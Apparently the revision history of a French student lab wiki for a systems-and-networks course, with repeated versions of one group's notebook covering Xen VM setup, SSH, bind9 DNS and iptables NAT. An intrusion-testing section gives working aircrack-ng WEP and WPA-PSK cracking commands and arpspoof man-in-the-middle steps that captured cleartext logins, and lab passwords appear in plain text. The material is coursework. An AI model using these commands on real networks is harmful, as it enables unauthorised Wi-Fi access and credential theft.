vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55103TP sysres IMA5sc 2020/2021 G92020-12-21T16:10:19Z<p>Pvernier : /* Tests d'intrusion */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|thumb|center]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
(photo)<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
(à remplir)<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55102TP sysres IMA5sc 2020/2021 G92020-12-21T16:09:54Z<p>Pvernier : /* Tests d'intrusion */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|thumb|center||alt=texte alternatif|400px]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
(photo)<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
(à remplir)<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Airmong.PNG&diff=55101Fichier:Airmong.PNG2020-12-21T16:07:56Z<p>Pvernier : </p>
<hr />
<div></div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Capture-wep-encrypt.PNG&diff=55100Fichier:Capture-wep-encrypt.PNG2020-12-21T16:06:47Z<p>Pvernier : </p>
<hr />
<div></div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Crack_resultat_WPA.PNG&diff=55099Fichier:Crack resultat WPA.PNG2020-12-21T16:01:00Z<p>Pvernier : </p>
<hr />
<div></div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=52763TP sysres IMA5sc 2020/2021 G92020-10-15T10:02:58Z<p>Pvernier : </p>
<hr />
<div> <br />
Création de la VM : root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.23 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
<br />
___________________________<br />
<br />
<br />
Tests d'intrusion <br />
<br />
Cassage de clef WEP d’un point d’accès WiFi<br />
<br />
liste des commandes : <br />
<br />
- airmon-ng : affiche les interfaces réseau<br />
<br />
- airmon-ng start <interface>: passe l'interface en mode monitor<br />
<br />
- airodump-ng --encrypt wep 'nomInterface' : affiche les réseaux wifi WEP<br />
<br />
- airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface' : capture les paquets émis par le point d'accés ciblé<br />
<br />
- aircrack-ng -x 'nomFichier'-01.cap : crack la clef WEP (à condition d'avoir capturé assez de paquets)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&diff=52556TP sysres IMA5sc 2020/20212020-10-12T14:40:32Z<p>Pvernier : /* Répartition des binômes */</p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]<br />
| RINGOT Loïc & SANCHEZ Pierre<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]<br />
| NDUWAMUNGU Jean De Dieu & MOINAT Théau<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]<br />
| VIEUBLED Tanguy & VERNIER Paul<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]<br />
| NOM Prénom & NOM Prénom<br />
|}</div>Pvernier